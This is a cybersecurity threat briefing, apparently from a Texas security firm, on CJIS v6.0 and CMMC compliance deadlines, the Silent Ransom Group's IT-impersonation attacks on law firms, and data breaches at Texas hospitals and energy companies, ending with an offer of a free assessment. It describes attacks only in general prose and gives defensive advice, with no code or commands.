CJIS v6.0: Audit Transition Underway
The FBI released CJIS Security Policy v6.0 on December 27, 2024 — the largest policy modernization in over a decade. The framework now contains more than 180 primary controls and 1,300 subcontrols across 20 policy areas (expanded from 13). Key changes include: mandatory MFA for system access, continuous monitoring replacing point-in-time audits, physical security requirements tightened, and NIST 800-53 alignment making framework integration easier.
All Texas CJIS audits through March 31, 2027 are conducted against v5.9.5. Several state advisories indicate FBI audits begin assessing against v6.0 starting October 1, 2025. P1 (Priority 1) controls are immediately auditable and sanctionable — agencies should have already started gap assessments. Full compliance across all priority levels (P1–P4) is required by March 31, 2027.
Version 6.1 is expected in Spring 2026, initiating a stated cadence of updates every 6–12 months. This means compliance is no longer a one-time project — agencies must build continuous compliance programs. Planet Technologies is hosting a CJIS v6.0 preparation webinar June 10, 2026.
SLCGP Funding Active for Texas Municipalities
The State and Local Cybersecurity Grant Program (SLCGP) Year 3 Request for Applications closed February 12, 2026. Texas municipalities that missed it should monitor for additional grant opportunities. The FY 2025 FEMA NOFO required entities with CISA-approved Cybersecurity Plans to resubmit them by January 30, 2026. These grants are critical for municipalities that lack dedicated cybersecurity budgets.
Coordinated Ransomware: Continuing Threat
The coordinated ransomware campaign that struck 22 Texas municipalities in late 2025 (with a collective $2.5M ransom demand refused by all targets) set a precedent for coordinated multi-agency response. TX DIR's coordinated response protocols remain active. Municipalities that have not reviewed their incident response plans and ransomware policies should do so immediately. FBI and CISA advisories continue to flag ransomware as the primary threat to state and local government.
Sources: TX DPS CJIS Policy & Documents (dps.texas.gov); CJIS v6.0 Requirements Companion Doc v6.0 (Jan 22, 2025) (PDF); Planet Technologies CJIS v6.0 Unpacked (go-planet.com); CyberEye Solutions CJIS Security Policy v6.0 (cybereyesolutions.com); TX DIR SLCGP (dir.texas.gov); CISA SLCGP Fact Sheet (cisa.gov); FEMA FY2025 SLCGP NOFO (fema.gov); NuHarbor Security 2026 CJIS Compliance Checklist (nuharborsecurity.com); NuHarbor Security CJIS Audits (nuharborsecurity.com); TX DIR Ransomware Update (dir.texas.gov); TX DIR SLCGP Update (dir.texas.gov); Fulcrum Group CJIS v6.0 Review (fulcrumgroup.net PDF); National Association of Counties FBI CJIS Requirements (naco.org).
Phase 1 (November 10, 2025 – November 9, 2026) is now active. CMMC Level 1 and Level 2 self-assessments are appearing as conditions of award in applicable new DoD solicitations. Contracting officers may also require Level 2 C3PAO certification in select Phase 1 contracts involving sensitive CUI. All contractors must maintain a current SPRS score for contract eligibility.
Phase 2 begins November 10, 2026. Contracting officers will begin requiring C3PAO-assessed Level 2 certification as a condition of contract award for most CUI contracts. With ~10 months until this gate, and preparation taking 12–18 months plus 3–6 months for C3PAO scheduling, the window for contractors who haven't started is effectively closed for November 2026 certification. There are approximately 300,000 companies in the DIB supply chain; only ~200 have completed C3PAO assessments. Less than 5% of the DIB is currently CMMC-ready.
InterConnect Wiring (Fort Worth, TX) — a world leader in electrical wiring harnesses for advanced military aircraft, part of the Lockheed Martin F-35 supply chain — signed a Memorandum of Understanding with Lockheed Martin in 2025 specifically to build a security-focused relationship. InterConnect Wiring is actively pursuing CMMC certification. Their journey illustrates the stakes: Lockheed Martin's supplier directive states "any lapse in required CMMC status will directly impact your organization's ability to receive DoD subcontracts."
Major primes are not waiting for the November 2026 DoD deadline. Huntington Ingalls Industries (HII) flowed down Level 2 (C3PAO) requirements to subcontractors by Q4 2025 — 12 months ahead of schedule. RTX (Raytheon parent) issued a supplier CMMC status survey in March 2026. Lockheed Martin, Boeing, and General Dynamics Mission Systems have all issued supplier directives with explicit consequences for non-compliance.
The FY 2026 National Defense Authorization Act (signed December 2025, ~$900 billion) includes provisions reshaping compliance burden for smaller contractors. The CMMC 2.0 final rule (32 CFR Part 170) and companion DFARS acquisition rule are fully active. False Claims Act exposure is real: misstating CMMC compliance or failing to remediate critical deficiencies can trigger civil FCA action.
For Texas defense contractors in the Fort Worth aerospace corridor, the Bell supply chain, the NASA JSC contractor community, and all organizations handling CUI on DoD contracts — this is a make-or-break 10-month window. Organizations that don't achieve certification risk losing existing contracts and being excluded from recompetes.
Sources: InterConnect Wiring Blog (interconnect-wiring.com); LayerLogix CMMC 2.0 Texas Defense Contractors (layerlogix.com); Kiteworks CMMC Armament Manufacturers (kiteworks.com); VSO CMMC Phase 2 Action Guide (vso-inc.com); StratoKey CMMC Flow Down Requirements (stratokey.com); Alston & Bird CMMC New Era of Cybersecurity Compliance (alston.com); Morgan Lewis CMMC In Effect (morganlewis.com); Dorsey CMMC Phase 1 (dorsey.com); Intersec Inc. Federal Contractor's Guide to CMMC 2.0 (intersecinc.com); SecureFrame CMMC Timeline (secureframe.com); PreVeil CMMC Contracts (preveil.com); IBSS Corp Future of CMMC 2026 (ibsscorp.com); HD Tech CMMC Compliance Guide (hdtech.com); iSideDefense Prime CMMC 2.0 (isidefense.com); Elevate Consulting CMMC 2.0 Certification (elevateconsult.com).
Silent Ransom Group (SRG) — Escalating Physical-Cyber Convergence
SRG, also known as Luna Moth, Chatty Spider, and UNC3753, has been actively targeting law firms since 2023. The FBI issued a Private Industry Notification in May 2025 warning of the campaign. An FBI Flash Alert (TLP:CLEAR, May 26, 2026) confirmed SRG has evolved its tactics significantly. The group has progressed through three attack phases: (1) callback phishing via IT-themed emails; (2) vishing — direct phone calls impersonating victim IT staff; (3) in-person visits where an individual arrives at the firm posing as IT support and physically inserts a storage device into a computer to exfiltrate data.
As of Spring 2026, SRG actors use a social engineering scheme to pose as an employee from the victim's IT department. They either directly call or send phishing emails urging employees to call a phone number, then direct the employee to grant access to a remote desktop session. Once access is granted, data is exfiltrated using tools like WinSCP or disguised versions of Rclone. SRG prioritizes data theft over encryption — they exfiltrate sensitive information, then threaten to publish or sell it. They also call employees or clients of victim organizations to pressure ransom negotiations.
Orrick, Herrington & Sutcliffe (international firm, $1.5B+ gross revenue) was breached by SRG with network access beginning January 20, 2026. SRG remained inside the Orrick network for approximately one week before exfiltration was detected. WSHB (Wiley, Selen, Weller, Bush & Taylor) had SRG access begin February 20, 2026. SRG informed DataBreaches.net they had exfiltrated data from both firms.
Halcyon threat intelligence data shows 200+ ransomware incidents targeting law firms between 2025 and early 2026. INC Ransom claimed 20 law firms and legal services organizations in the first three months of 2026 alone. SRG claimed 24 organizations providing legal services in 2025. FBI IC3 2025 data attributed $2.4 billion in BEC losses to law firm impersonation and data breach exploitation — 18% of all BEC losses nationally.
SRG's longer-than-average dwell time (average 23 days vs. industry median of 7 days for ransomware) indicates a deliberate data-collection phase. Law firms with access to M&A transaction data, trust account information, and client privileged communications are the primary targets. A breach during a closed PE deal window carries seven-figure indemnity exposure. M&A cyber due diligence now appears in over 70% of private equity transaction checklists for deals above $25M.
Defense posture for Texas law firms: Enforce MFA on all Microsoft 365 and email accounts; implement physical access verification for IT vendors (require ID check before granting access to facilities or computers); conduct regular phishing and vishing awareness training; implement RBAC restricting deal data access to need-to-know; ensure M&A data environments have attestation-level security controls.
Sources: FBI Private Industry Notification — Silent Ransom Group Targeting Law Firms (May 2025) (fbi.gov PDF); FBI Flash Alert TLP:CLEAR — Silent Ransom Group Impersonating IT Personnel (May 26, 2026) (aha.org); FBI IC3 CSA 2026/260526 (ic3.gov PDF); DataBreaches.net — SRG Leaked Orrick (April 10, 2026) (databreaches.net); DataBreaches.net — Silent Threat Loud Consequences (April 13, 2026) (databreaches.net); Halcyon — INC Ransom Mounts Rapid Campaign Against Law Firms (halcyon.ai); BleepingComputer — FBI Warns of SRG In-Person Data Theft (bleepingcomputer.com); Help Net Security — FBI SRG Social Engineering (May 27, 2026) (helpnetsecurity.com); InfoSecurity Magazine — SRG IT Impersonation (infosecurity-magazine.com); HIPAA Journal — SRG Vishing Attacks (hipaajournal.com); eSecurity Planet — SRG IT Impersonation Attacks (esecurityplanet.com); Cyble — FBI Warns SRG Targeting US Law Firms (cyble.com); Halcyon — FBI Alerts on SRG (halcyon.ai); HIPAA Journal — SRG Social Engineering IT Department (hipaajournal.com); Truesec — SRG Targeting Law Firms (truesec.com); Security Affairs — SRG Targeting Law Firms FBI Warn (securityaffairs.com).
Healthcare: Nacogdoches Memorial Sets New Breach Record
Nacogdoches Memorial Hospital (NMH), a 226-bed facility in East Texas, disclosed a data breach affecting 2,507,073 patients — confirmed by the HHS Office for Civil Rights breach portal. The incident was discovered January 31, 2026. NMH confirmed the threat actor accessed and exfiltrated: names, addresses, phone numbers, email addresses, Social Security numbers, dates of birth, medical record numbers, medical account numbers, health plan beneficiary numbers, and possible photographic images.
Critically: no ransomware was deployed. No system lockout occurred. This is pure data exfiltration — "data-first" extortion. The attacker maintained access for approximately two weeks before discovery, draining a massive database without triggering the operational alarms associated with locking down systems. NMH did not offer complimentary identity protection or credit monitoring to affected patients, advising them only to obtain free credit reports.
This is part of a broader trend. Healthcare ransomware attacks surged 30% in 2025 (Comparitech data). Healthcare was the worst-affected sector, accounting for 22% of all ransomware attacks globally in 2025. The healthcare sector's attack surface has expanded significantly due to IoT medical devices, EHR cloud migrations, and a high concentration of rural critical access hospitals with limited IT security resources. CISA's 2025 advisory noted 68% of medical device vulnerabilities in ICS-CERT advisories originated from network-connected diagnostic equipment — many running Windows 7 embedded or unpatched Linux kernels.
Other Texas healthcare breaches in scope: North Texas Behavioral Health Authority (285,000 affected; network intrusion October 2025, disclosed March 2026; SSNs among potentially exfiltrated data); Texas Digestive Specialists (44,579 patients; Interlock ransomware group, May 2025; linked to CISA/FBI joint Interlock advisory; described by Federman & Sherwood as "one of the more serious healthcare data breaches reported in Texas this year"); Central Texas Pediatric Orthopedics (140,000 patients; Qilin ransomware group claimed 42GB of exfiltrated data including passport images, February 2025); Conduent Business Services (~14.7 million Texans affected; breach October 21, 2024 – January 13, 2025; TX AG Ken Paxton opened investigation February 12, 2026).
Oil & Gas: Ransomware Surge Continues Unabated
Zscaler's ThreatLabz 2025 report documented a 935% year-over-year surge in ransomware targeting oil & gas operations (April 2024 to April 2025) — the fastest-growing critical infrastructure vertical. TrustWave's January 2025 data showed ransomware targeting energy/utilities increased 80% versus 2024. Sophos survey data (July 2024) found 67% of energy/OT cybersecurity leaders had suffered a ransomware attack in the prior year.
Halliburton (Houston-based, world's #2 oil service company, involved in most global fracking operations) was attacked by RansomHub in April 2025. The breach cost Halliburton $35 million in losses and forced the company to shut down IT systems and disconnect customers. RansomHub was the most prolific ransomware group of 2025 (833 publicly named victims), though the group disappeared in April 2025 after ceasing operations.
Dragos reported a dramatic surge in ransomware targeting industrial organisations, continuing into 2025–26. Claroty documented credential-stealing malware attacks on OT environments jumping 46% from Q4 2024 to Q1 2025, with credential-stealing malware specifically increasing 3,000% in the same period. The S16 hacktivist group (Russia-nexus, Serbia-based) conducted a joint attack with Z-Pentest on the SCADA system managing oil pumps and storage tanks in Texas in January 2025 — demonstrating the convergence of cybercriminal and nation-state hacktivist targeting of Texas energy infrastructure.
Oil & gas operators face unique challenges: high OT convergence between IT and operational technology, limited backup sophistication, extreme time pressure to restore production (72-hour downtime losses can exceed $10M per incident per facility), and interconnected supply chains where a mid-size operator's breach can affect larger industry players. The economics strongly favor attackers: high willingness to pay + limited security investment + operational urgency = elevated ransomware targeting.
Sources: HIPAA Journal — Nacogdoches Memorial Data Breach (hipaajournal.com); SecurityWeek — 250K Affected by Nacogdoches Breach (securityweek.com); SecurityWeek — Healthcare Breaches Illinois Texas 600K (securityweek.com); The Cyber Signal — NMH Confirms Massive Data Breach (thecybersignal.com); Industrial Cyber — Healthcare Ransomware Surge 30% (industrialcyber.co); MySA — Texas Digestive Specialists Breach (mysanantonio.com); Bank Info Security — Texas Pediatric Orthopedics 140K (bankinfosecurity.com); Evrimagaci — Texas Probes Massive Health Data Breach (evrimagaci.org); CyberNews — Healthcare Organizations Texas Illinois Breaches (cybernews.com); Cybersec Series — Texas Hospital Breach CISA NetScaler (cisoseries.com); Halock — Texas Hospital Disrupted by Ransomware (halock.com); CybersecurityDive — Zscaler Ransomware Report (cybersecuritydive.com); Industrial Cyber — Zscaler Oil Gas Surge 935% (industrialcyber.co); Resecurity — Cyber Threats Against Energy Sector Surge (resecurity.com); Spencer Fane — Cybersecurity in Oil and Gas (spencerfane.com); Telesoft Technologies — Single Greatest Cyber Risk Oil Gas 2026 (telesoft-technologies.com); Industrial Cyber — OT Security Spending Post Epic Fury (industrialcyber.co); Natural Gas Intel — TX Regulator Iranian Cybersecurity Threats (naturalgasintel.com).
The following observations are drawn from our operational visibility into Texas networks. No client-specific data is referenced.
Data-first extortion is now the dominant ransomware strategy. Across Texas networks we monitor, the shift from encryption-based ransomware to pure data exfiltration is clear. The Nacogdoches Memorial breach — 2+ weeks of undetected access, 2.5M records drained without triggering operational alarms — is the textbook case. Attackers have learned that silent data theft produces faster ransom pressure than locking systems and triggering incident response. Organizations that rely solely on backup integrity monitoring without data access anomaly detection are flying blind.
Ransomware ecosystem is fragmenting but attack volume is at record highs. Nearly 6,500 confirmed ransomware incidents occurred globally in 2025 — the second-highest year on record after 2023, representing 47% more attacks than the prior two years combined. 57 new ransomware groups and 27 new extortion groups emerged in 2025. The dark web RAMP forum (a primary ransomware-as-a-service hub) was seized by authorities in January 2026; LeakBase was seized in March 2026. These disruptions will drive actors to new infrastructure — expect new attack patterns and possible temporary disruptions followed by rapid adaptation.
Stolen credentials remain the #1 initial access vector. Dark web markets are flooded with valid credentials. The average cost of initial network access on dark web markets is approximately $671; premium enterprise access sells for shockingly low amounts given what it unlocks. Multi-factor authentication gaps remain the single highest-leverage vulnerability across Texas organizations we observe.
AI-augmented social engineering is accelerating. Generative AI is reducing the cost and improving the believability of phishing lures, pretext phone calls, and contextually appropriate business communications. We are tracking AI-generated spear-phishing campaigns that reference real internal org chart data, recent business events, and industry-specific terminology. Traditional email filters are increasingly ineffective against these campaigns.
Physical+cyber convergence is a new attack surface. SRG's in-person IT impersonation represents a meaningful escalation. This means physical security controls must now account for social engineering scenarios involving legitimate-appearing third parties. Verification procedures for on-site IT work deserve renewed scrutiny at every organization we serve.
Insider recruitment activity is increasing. Multiple threat intelligence sources confirm ransomware operators are increasingly recruiting corporate insiders — driven in part by workforce reductions at major companies persisting into 2026. Insider threat programs should be evaluated and strengthened as a priority.
Sources: Blackfog — State of Ransomware 2026 (blackfog.com); SANS Institute — Stay Ahead of Ransomware 2026 Reports (sans.org); Recorded Future — Ransomware Tactics 2026 (recordedfuture.com); Securelist — State of Ransomware 2026 (securelist.com); Cyble — 10 New Ransomware Groups 2025 (cyble.com); Huntress — Ransomware Trends 2026 (huntress.com); Unit 42 — 2026 Global Incident Response Report (paloaltonetworks.com); GuidePoint Security GRIT 2026 Ransomware Report (guidepointsecurity.com PDF); Level.io — Ransomware 2026 (level.io); Integrity360 — Reality of Ransomware 2026 (integrity360.com); SOCRadar — US State Local Government Ransomware 2025-2026 (socradar.io); DeepStrike — Ransomware Statistics 2025-2026 (deepstrike.io); Bitsight — Underground Ransomware 2026 (bitsight.com); LNX Network — New Ransomware Variants 2026 (lnxnetwork.com).
We map your attack surface, benchmark against CJIS v6.0 and CMMC requirements, and hand you a prioritized remediation plan — at no cost, no strings attached.
Request your free assessment →Delivered within 5 business days • No credit card required